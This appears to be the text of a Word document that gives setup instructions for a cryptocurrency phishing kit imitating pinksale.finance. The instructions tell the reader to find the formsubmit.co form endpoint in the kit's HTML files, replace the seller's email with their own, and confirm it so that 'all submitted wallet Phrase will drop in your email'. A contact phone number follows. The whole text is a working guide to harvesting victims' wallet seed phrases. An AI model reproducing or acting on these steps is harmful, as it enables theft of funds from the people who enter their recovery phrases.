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Zip File</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Locate this folders below</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">pinksale.finance/connect.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">dapp/index.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Locate this url in above folder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https://formsubmit.co/officialwebgeak@gmail.com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email officialwebgeak@gmail.com to yours</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Note: this url shows multiple time in this folder kindly change all email attached to yours</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Click Save Changes</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Head to your website and submit a random phrase</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">A confirmation email will be sent to you “to activate the form for your email"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Once Confirmed…….</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Boom all submitted wallet Phrase will drop in your email</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Contact : 09076225136</w:t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ormsubmit.co/officialwebgeak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